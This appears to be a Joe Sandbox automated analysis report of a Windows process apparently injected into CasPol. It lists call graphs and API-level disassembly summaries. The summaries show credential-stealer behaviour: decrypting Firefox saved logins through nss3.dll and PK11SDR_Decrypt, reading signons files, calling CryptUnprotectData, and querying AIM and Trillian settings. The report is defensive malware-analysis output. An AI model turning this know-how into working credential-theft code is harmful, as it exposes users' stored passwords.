FreeLibrary 6095->6098 6100 404df4 6096->6100 6101 404ddd MessageBoxA 6096->6101 6097->6098 6098->6096 6099 404dc9 6098->6099 6099->6096 6100->6043 6101->6043 6103 40c692 6102->6103 6104 41219b LoadLibraryA 6102->6104 6106 410de1 GetCurrentProcess 6103->6106 6104->6103 6105 4121af GetProcAddress 6104->6105 6105->6103 6187 410daa 6106->6187 6109 410e02 GetLastError 6112 40c69f 6109->6112 6110 410e0a 6193 410d8a 6110->6193 6112->6049 6112->6050 6113 410e11 6114 410e36 6113->6114 6115 410e1d GetProcAddress 6113->6115 6117 410d8a LoadLibraryA 6114->6117 6115->6114 6116 410e2a LookupPrivilegeValueA 6115->6116 6116->6114 6118 410e4f 6117->6118 6119 410e53 GetProcAddress 6118->6119 6120 410e6d CloseHandle 6118->6120 6119->6120 6121 410e60 AdjustTokenPrivileges 6119->6121 6120->6112 6121->6120 6124 40c453 6123->6124 6125 40c461 ??2@YAPAXI 6124->6125 6126 40c478 6125->6126 6128 40c47d 6125->6128 6204 4092cc 6126->6204 6129 40c4b2 DeleteObject 6128->6129 6130 40c4bf 6128->6130 6129->6130 6196 406ae0 6130->6196 6132 40c4c4 6199 401000 6132->6199 6136 40c508 6137 40763d 6136->6137 6216 40733e free free 6137->6216 6141 40746b malloc memcpy free free 6144 407678 6141->6144 6142 407758 6150 407783 6142->6150 6240 40746b 6142->6240 6144->6141 6144->6142 6145 4076fc free 6144->6145 6144->6150 6217 407364 6144->6217 6232 406982 6144->6232 6145->6144 6149 407364 7 API calls 6149->6150 6229 407491 6150->6229 6151 4077af 6154 4077f5 6151->6154 6155 4077b7 6151->6155 6152 4077c7 _strcmpi 6152->6155 6153 4077de _strnicmp 6153->6155 6154->6059 6154->6060 6155->6152 6155->6153 6155->6154 6245 409141 6156->6245 6158 409196 6250 409068 6158->6250 6162 409141 3 API calls 6161->6162 6163 40905a 6162->6163 6274 408fbc 6163->6274 6280 403cb2 6166->6280 6170 40c5f1 6174 40c665 6170->6174 6283 40bbf0 memset GetModuleFileNameA strrchr 6170->6283 6171 40c5f6 6326 40c50e _strcmpi 6171->6326 6174->6082 6174->6083 6177 40c610 6305 40a8f2 6177->6305 6181->6081 6182->6073 6184 407a80 free 6183->6184 6185 
407a87 6183->6185 6184->6185 6186 40733e free free 6185->6186 6186->6044 6188 410d8a LoadLibraryA 6187->6188 6189 410db5 6188->6189 6190 410db9 GetProcAddress 6189->6190 6191 410dda 6189->6191 6190->6191 6192 410dca 6190->6192 6191->6109 6191->6110 6192->6191 6194 410da6 6193->6194 6195 410d8f LoadLibraryA 6193->6195 6194->6113 6195->6113 6214 406a19 memset _mbscpy 6196->6214 6198 406af7 CreateFontIndirectA 6198->6132 6200 40102c 6199->6200 6201 401030 LoadIconA 6200->6201 6202 40100d strncat 6200->6202 6203 402c8f _mbscpy 6201->6203 6202->6200 6203->6136 6215 406d91 memset 6204->6215 6206 4092df ??2@YAPAXI 6207 4092f3 ??2@YAPAXI 6206->6207 6209 409314 ??2@YAPAXI 6207->6209 6211 409335 ??2@YAPAXI 6209->6211 6213 409356 6211->6213 6213->6128 6214->6198 6215->6206 6216->6144 6218 407372 strlen 6217->6218 6219 40737e 6217->6219 6218->6219 6220 407396 free 6219->6220 6221 40739f 6219->6221 6222 4073a9 6220->6222 6223 406982 3 API calls 6221->6223 6224 4073c2 6222->6224 6225 4073b9 free 6222->6225 6223->6222 6227 406982 3 API calls 6224->6227 6226 4073ce memcpy 6225->6226 6226->6144 6228 4073cd 6227->6228 6228->6226 6230 4074a1 6229->6230 6231 407497 free 6229->6231 6230->6151 6231->6230 6233 406989 malloc 6232->6233 6234 4069cf 6232->6234 6236 4069c5 6233->6236 6237 4069aa 6233->6237 6234->6144 6236->6144 6238 4069be free 6237->6238 6239 4069ae memcpy 6237->6239 6238->6236 6239->6238 6241 407482 6240->6241 6242 407476 free 6240->6242 6244 406982 3 API calls 6241->6244 6243 40748d 6242->6243 6243->6149 6244->6243 6263 4069e8 GetModuleFileNameA 6245->6263 6247 409147 strrchr 6248 409156 6247->6248 6249 409159 _mbscat 6247->6249 6248->6249 6249->6158 6264 414060 6250->6264 6255 408ca1 3 API calls 6256 4090b0 6255->6256 6257 408ca1 3 API calls 6256->6257 6258 4090bb EnumResourceNamesA EnumResourceNamesA _mbscpy memset 6257->6258 6259 409107 LoadStringA 6258->6259 6260 40911d 6259->6260 6260->6259 6262 409135 6260->6262 6271 408d0f _itoa 6260->6271 6262->6066 6263->6247 
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                                                                                                  • strlen.MSVCRT ref: 004078FC
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407904
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 379999529-0
                                                                                                                                                                                  • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                  • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                    • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                    • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                    • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                    • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                    • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                    • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                    • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                  • memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                  • strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                  • strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                    • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                    • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                                  • API String ID: 2719586705-3659000792
                                                                                                                                                                                  • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                  • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                                                                                                  • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                  • memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                  • memset.MSVCRT ref: 00407D09
                                                                                                                                                                                  • memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407DA0
                                                                                                                                                                                  • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                  • API String ID: 1832431107-3760989150
                                                                                                                                                                                  • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                  • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                    • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                    • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                    • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                    • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                    • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                    • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                  • memset.MSVCRT ref: 00406537
                                                                                                                                                                                    • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                    • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                  • memset.MSVCRT ref: 0040657E
                                                                                                                                                                                  • memset.MSVCRT ref: 00406596
                                                                                                                                                                                  • memset.MSVCRT ref: 004065AE
                                                                                                                                                                                  • strlen.MSVCRT ref: 004065B9
                                                                                                                                                                                  • strlen.MSVCRT ref: 004065C7
                                                                                                                                                                                  • strlen.MSVCRT ref: 004065F2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406600
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040662B
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406639
                                                                                                                                                                                    • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                    • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                                                    • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                                                    • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                                                    • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                                                    • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                                                                  • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                                  • API String ID: 4081699353-561706229
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FC6B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FC82
                                                                                                                                                                                    • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                    • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                    • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                                                    • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                                                                                                    • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                    • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                  • API String ID: 748118687-1174173950
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$DeleteIconLoadObject
                                                                                                                                                                                  • String ID: ;@
                                                                                                                                                                                  • API String ID: 1986663749-2925476404
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                  • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                  • API String ID: 145871493-1827663648
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00411CB8
                                                                                                                                                                                    • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                                                    • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                                                                  • memset.MSVCRT ref: 00411CF4
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3143880245-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2760881011-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 71445658-0